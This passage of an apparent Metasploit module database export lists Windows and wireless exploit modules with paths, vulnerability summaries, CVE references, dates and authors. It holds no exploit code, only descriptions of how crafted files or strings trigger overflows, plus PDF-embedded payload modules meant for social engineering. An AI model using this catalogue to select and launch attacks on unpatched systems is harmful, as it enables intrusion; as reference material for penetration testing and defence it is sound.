elements. This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:18:4d:02:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then unplugging and reinserting the USB card. The exploit can take up to a minute to execute the payload, depending on system activity. NetGear was NOT contacted about this flaw. A search of the SecurityFocus database indicates that NetGear has not provided an official patch or solution for any of the thirty flaws listed at the time of writing. This list includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, 16835, 19468, and 19973. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","t","2006-11-16 00:00:00",0,,"aggressive","t","CVE-2006-5972, OSVDB-30473, URL-http://projects.info-pull.com/mokb/MOKB-16-11-2006.html","hdm " 563,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb","exploit","windows/email/ms07_017_ani_loadimage_chunksize","exploit/windows/email/ms07_017_ani_loadimage_chunksize","Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",500,"This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.","Metasploit Framework License (BSD)","f","2007-03-28 00:00:00",0,,"passive","t","BID-23194, CVE-2007-0038, CVE-2007-1765, MSB-MS07-017, OSVDB-33629, URL-http://www.determina.com/security.research/vulnerabilities/ani-header.html, URL-http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp, URL-http://www.microsoft.com/technet/security/advisory/935423.mspx","hdm , skape " 564,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb","exploit","windows/email/ms10_045_outlook_ref_only","exploit/windows/email/ms10_045_outlook_ref_only","Outlook ATTACH_BY_REF_ONLY File Execution",600,"It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",0,,"passive","t","BID-41446, CVE-2010-0266, MSB-MS10-045, OSVDB-66296, URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001","Yorick Koster " 565,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb","exploit","windows/email/ms10_045_outlook_ref_resolve","exploit/windows/email/ms10_045_outlook_ref_resolve","Outlook ATTACH_BY_REF_RESOLVE File Execution",600,"It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",0,,"passive","t","BID-41446, CVE-2010-0266, MSB-MS10-045, OSVDB-66296, URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001","Yorick Koster " 566,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/emc/alphastor_agent.rb","exploit","windows/emc/alphastor_agent","exploit/windows/emc/alphastor_agent","EMC AlphaStor Agent Buffer Overflow",500,"This module exploits a stack buffer overflow in EMC AlphaStor 3.1. By sending a specially crafted message, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-05-27 00:00:00",0,,"aggressive","t","CVE-2008-2158, OSVDB-45714, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702","MC " 567,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/emc/networker_format_string.rb","exploit","windows/emc/networker_format_string","exploit/windows/emc/networker_format_string","EMC Networker Format String",300,"This module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55330, CVE-2012-2288, OSVDB-85116, URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt, URL-http://blog.exodusintel.com/2012/08/29/when-wrapping-it-up-goes-wrong/","Aaron Portnoy, Luigi Auriemma , juan vazquez " 568,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb","exploit","windows/fileformat/a-pdf_wav_to_mp3","exploit/windows/fileformat/a-pdf_wav_to_mp3","A-PDF WAV to MP3 v1.0.0 Buffer Overflow",300,"This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-08-17 00:00:00",0,,"aggressive","t","EDB-14676, EDB-14681, OSVDB-67241","Dr_IDE, d4rk-h4ck3r, dookie" 569,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb","exploit","windows/fileformat/acdsee_fotoslate_string","exploit/windows/fileformat/acdsee_fotoslate_string","ACDSee FotoSlate PLP File id Parameter Overflow",400,"This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","BID-49558, CVE-2011-2595, OSVDB-75425","Parvez Anwar, juan vazquez " 570,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/acdsee_xpm.rb","exploit","windows/fileformat/acdsee_xpm","exploit/windows/fileformat/acdsee_xpm","ACDSee XPM File Section Buffer Overflow",400,"This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",0,,"aggressive","t","BID-23620, CVE-2007-2193, OSVDB-35236","MC " 571,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/actfax_import_users_bof.rb","exploit","windows/fileformat/actfax_import_users_bof","exploit/windows/fileformat/actfax_import_users_bof","ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",300,"This module exploits a vulnerability in ActiveFax Server. The vulnerability is a stack based buffer overflow in the ""Import Users from File"" function, due to the insecure usage of strcpy while parsing the csv formatted file. The module creates a .exp file that must be imported with ActiveFax Server. It must be imported with the default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.","Metasploit Framework License (BSD)","t","2012-08-28 00:00:00",0,,"aggressive","t","EDB-20915, OSVDB-85175, URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html","Brandon Perry, Craig Freyman, juan vazquez " 572,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/activepdf_webgrabber.rb","exploit","windows/fileformat/activepdf_webgrabber","exploit/windows/fileformat/activepdf_webgrabber","activePDF WebGrabber ActiveX Control Buffer Overflow",100,"This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-08-26 00:00:00",0,,"aggressive","t","OSVDB-64579, URL-http://www.activepdf.com/products/serverproducts/webgrabber/","MC " 573,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb","exploit","windows/fileformat/adobe_collectemailinfo","exploit/windows/fileformat/adobe_collectemailinfo","Adobe Collab.collectEmailInfo() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"aggressive","t","CVE-2007-5659, OSVDB-41495","Didier Stevens , MC " 574,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb","exploit","windows/fileformat/adobe_cooltype_sing","exploit/windows/fileformat/adobe_cooltype_sing","Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",500,"This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"aggressive","t","CVE-2010-2883, OSVDB-67849, URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html, URL-http://www.adobe.com/support/security/advisories/apsa10-02.html","Unknown, jduck , sn0wfl0w" 575,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb","exploit","windows/fileformat/adobe_flashplayer_button","exploit/windows/fileformat/adobe_flashplayer_button","Adobe Flash Player ""Button"" Remote Code Execution",300,"This module exploits a vulnerability in the handling of certain SWF movies within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-10-28 00:00:00",0,,"aggressive","t","BID-44504, CVE-2010-3654, OSVDB-68932, URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-05.html","Haifei Li, Unknown, jduck " 576,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb","exploit","windows/fileformat/adobe_flashplayer_newfunction","exploit/windows/fileformat/adobe_flashplayer_newfunction","Adobe Flash Player ""newfunction"" Invalid Pointer Use",300,"This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-06-04 00:00:00",0,,"aggressive","t","BID-40586, CVE-2010-1297, OSVDB-65141, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-01.html","Unknown, jduck " 577,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb","exploit","windows/fileformat/adobe_flatedecode_predictor02","exploit/windows/fileformat/adobe_flatedecode_predictor02","Adobe FlateDecode Stream Predictor 02 Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.","Metasploit Framework License (BSD)","f","2009-10-08 00:00:00",0,,"aggressive","t","BID-36600, CVE-2009-3459, OSVDB-58729, URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html, URL-http://www.fortiguard.com/analysis/pdfanalysis.html","jduck , unknown" 578,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_geticon.rb","exploit","windows/fileformat/adobe_geticon","exploit/windows/fileformat/adobe_geticon","Adobe Collab.getIcon() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"aggressive","t","CVE-2009-0927, OSVDB-53647, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-014/","Didier Stevens , MC , jduck " 579,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb","exploit","windows/fileformat/adobe_illustrator_v14_eps","exploit/windows/fileformat/adobe_illustrator_v14_eps","Adobe Illustrator CS4 v14.0.0",500,"Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit","Metasploit Framework License (BSD)","f","2009-12-03 00:00:00",0,,"aggressive","t","BID-37192, CVE-2009-4195, EDB-10281, OSVDB-60632, URL-http://retrogod.altervista.org/9sg_adobe_illuso.html","Nine:Situations:Group::pyrokinesis, dookie" 580,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_jbig2decode.rb","exploit","windows/fileformat/adobe_jbig2decode","exploit/windows/fileformat/adobe_jbig2decode","Adobe JBIG2Decode Memory Corruption",400,"This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.","Metasploit Framework License (BSD)","f","2009-02-19 00:00:00",0,,"aggressive","t","CVE-2009-0658, OSVDB-52073, URL-http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html","Didier Stevens , MC , natron , redsand, xort" 581,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_libtiff.rb","exploit","windows/fileformat/adobe_libtiff","exploit/windows/fileformat/adobe_libtiff","Adobe Acrobat Bundled LibTIFF Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.","Metasploit Framework License (BSD)","f","2010-02-16 00:00:00",0,,"aggressive","t","BID-38195, CVE-2010-0188, OSVDB-62526, URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html, URL-http://secunia.com/blog/76/, URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html","Microsoft, jduck , villy " 582,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_media_newplayer.rb","exploit","windows/fileformat/adobe_media_newplayer","exploit/windows/fileformat/adobe_media_newplayer","Adobe Doc.media.newPlayer Use After Free Vulnerability",400,"This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.","Metasploit Framework License (BSD)","f","2009-12-14 00:00:00",0,,"aggressive","t","BID-37331, CVE-2009-4324, OSVDB-60980","hdm , jduck , pusscat , unknown" 583,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb","exploit","windows/fileformat/adobe_pdf_embedded_exe","exploit/windows/fileformat/adobe_pdf_embedded_exe","Adobe PDF Embedded EXE Social Engineering",600,"This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","CVE-2010-1240, OSVDB-63667, URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/, URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/, URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/, URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html","Colin Ames , jduck " 584,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb","exploit","windows/fileformat/adobe_pdf_embedded_exe_nojs","exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs","Adobe PDF Escape EXE Social Engineering (No JavaScript)",600,"This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","CVE-2010-1240, OSVDB-63667, URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/, URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/, URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/, URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html","Jeremy Conway " 585,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_reader_u3d.rb","exploit","windows/fileformat/adobe_reader_u3d","exploit/windows/fileformat/adobe_reader_u3d","Adobe Reader U3D Memory Corruption Vulnerability",200,"This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"aggressive","t","BID-50922, CVE-2011-2462, OSVDB-77529, URL-http://blog.9bplus.com/analyzing-cve-2011-2462, URL-http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/, URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html, URL-http://www.adobe.com/support/security/advisories/apsa11-04.html, URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0","Felipe Andres Manzano, jduck , juan vazquez , sinn3r " 586,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb","exploit","windows/fileformat/adobe_u3d_meshdecl","exploit/windows/fileformat/adobe_u3d_meshdecl","Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",400,"This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-13 00:00:00",0,,"aggressive","t","CVE-2009-3953, OSVDB-61690, URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html","Felipe Andres Manzano , jduck " 587,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/adobe_utilprintf.rb","exploit","windows/fileformat/adobe_utilprintf","exploit/windows/fileformat/adobe_utilprintf","Adobe util.printf() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"aggressive","t","CVE-2008-2992, OSVDB-49520","Didier Stevens , MC " 588,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/altap_salamander_pdb.rb","exploit","windows/fileformat/altap_salamander_pdb","exploit/windows/fileformat/altap_salamander_pdb","Altap Salamander 2.5 PE Viewer Buffer Overflow",400,"This module exploits a buffer overflow in Altap Salamander <= v2.5. By creating a malicious file and convincing a user to view the file with the Portable Executable Viewer plugin within a vulnerable version of Salamander, the PDB file string is copied onto the stack and the SEH can be overwritten.","Metasploit Framework License (BSD)","f","2007-06-19 00:00:00",0,,"aggressive","t","BID-24557, CVE-2007-3314, OSVDB-37579, URL-http://vuln.sg/salamander25-en.html","patrick " 589,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aol_desktop_linktag.rb","exploit","windows/fileformat/aol_desktop_linktag","exploit/windows/fileformat/aol_desktop_linktag","AOL Desktop 9.6 RTX Buffer Overflow",300,"This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct component. By supplying a long string of data in the hyperlink tag, rich.rct copies this data into a buffer using a strcpy function, which causes an overflow, and results arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-01-31 00:00:00",0,,"aggressive","t","EDB-16085, OSVDB-70741","mr_me , sickn3ss, silent_dream, sinn3r , sup3r" 590,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aol_phobos_bof.rb","exploit","windows/fileformat/aol_phobos_bof","exploit/windows/fileformat/aol_phobos_bof","AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",200,"This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to 'Import()', an attacker can overrun a buffer and execute arbitrary code. NOTE: This ActiveX control is NOT marked safe for scripting or initialization.","Metasploit Framework License (BSD)","f","2010-01-20 00:00:00",0,,"aggressive","t","EDB-11204, OSVDB-61964, URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/","Trancer " 591,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb","exploit","windows/fileformat/apple_quicktime_pnsize","exploit/windows/fileformat/apple_quicktime_pnsize","Apple QuickTime PICT PnSize Buffer Overflow",400,"This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-08-08 00:00:00",0,,"aggressive","t","BID-49144, CVE-2011-0257","MC , corelanc0d3r " 592,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/apple_quicktime_texml.rb","exploit","windows/fileformat/apple_quicktime_texml","exploit/windows/fileformat/apple_quicktime_texml","Apple QuickTime TeXML Style Element Stack Buffer Overflow",300,"This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.","Metasploit Framework License (BSD)","f","2012-05-15 00:00:00",,,"aggressive","t","BID-53571, CVE-2012-0663, OSVDB-81934, URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html, URL-http://support.apple.com/kb/HT1222, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-107/","Alexander Gavrun, juan vazquez , sinn3r " 593,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audio_coder_m3u.rb","exploit","windows/fileformat/audio_coder_m3u","exploit/windows/fileformat/audio_coder_m3u","AudioCoder .M3U Buffer Overflow",300,"This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-05-01 00:00:00",0,,"aggressive","t","EDB-25141, OSVDB-92939","juan vazquez , metacom" 594,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audio_wkstn_pls.rb","exploit","windows/fileformat/audio_wkstn_pls","exploit/windows/fileformat/audio_wkstn_pls","Audio Workstation 6.4.2.4.3 pls Buffer Overflow",400,"This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"aggressive","t","CVE-2009-0476, EDB-10353, OSVDB-55424","dookie, germaya_x" 595,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audiotran_pls.rb","exploit","windows/fileformat/audiotran_pls","exploit/windows/fileformat/audiotran_pls","Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Audiotran. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2010-01-09 00:00:00",0,,"aggressive","t","CVE-2009-0476, EDB-11079, OSVDB-55424","Sebastien Duquette, dookie" 596,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb","exploit","windows/fileformat/aviosoft_plf_buf","exploit/windows/fileformat/aviosoft_plf_buf","Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",400,"This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a playlist file on to the stack, which may result aribitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"aggressive","t","EDB-18096, OSVDB-77043","modpr0be, sinn3r " 597,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/bacnet_csv.rb","exploit","windows/fileformat/bacnet_csv","exploit/windows/fileformat/bacnet_csv","BACnet OPC Client Buffer Overflow",400,"This module exploits a stack buffer overflow in SCADA Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client parses a specially crafted csv file, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2010-09-16 00:00:00",0,,"aggressive","t","BID-43289, OSVDB-68096, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf","Jeremy Brown, MC " 598,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb","exploit","windows/fileformat/blazedvd_hdtv_bof","exploit/windows/fileformat/blazedvd_hdtv_bof","BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",300,"This module exploits a vulnerability found in BlazeVideo HDTV Player's filename handling routine. When supplying a string of input data embedded in a .plf file, the MediaPlayerCtrl.dll component will try to extract a filename by using PathFindFileNameA(), and then copies whatever the return value is on the stack by using an inline strcpy. As a result, if this input data is long enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-03 00:00:00",0,,"aggressive","t","EDB-18693, EDB-22931, OSVDB-80896","b33f, sinn3r " 599,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/blazedvd_plf.rb","exploit","windows/fileformat/blazedvd_plf","exploit/windows/fileformat/blazedvd_plf","BlazeDVD 5.1 PLF Buffer Overflow",400,"This module exploits a stack over flow in BlazeDVD 5.1. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-03 00:00:00",0,,"aggressive","t","BID-35918, CVE-2006-6199, OSVDB-30770","MC " 600,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/bsplayer_m3u.rb","exploit","windows/fileformat/bsplayer_m3u","exploit/windows/fileformat/bsplayer_m3u","BS.Player 2.57 Buffer Overflow (Unicode SEH)",300,"This module exploits a buffer overflow in BS.Player 2.57. When the playlist import is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-01-07 00:00:00",0,,"aggressive","t","EDB-15934","C4SS!0 G0M3S, Chris Gabriel" 601,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ca_cab.rb","exploit","windows/fileformat/ca_cab","exploit/windows/fileformat/ca_cab","CA Antivirus Engine CAB Buffer Overflow",400,"This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. By creating a specially crafted CAB file, an an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"aggressive","t","BID-24330, CVE-2007-2864, OSVDB-35245, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-035.html","MC " 602,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb","exploit","windows/fileformat/cain_abel_4918_rdp","exploit/windows/fileformat/cain_abel_4918_rdp","Cain & Abel <= v4.9.24 RDP Buffer Overflow",400,"This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24 and below. An attacker must send the file to victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.","Metasploit Framework License (BSD)","f","2008-11-30 00:00:00",0,,"aggressive","t","BID-32543, 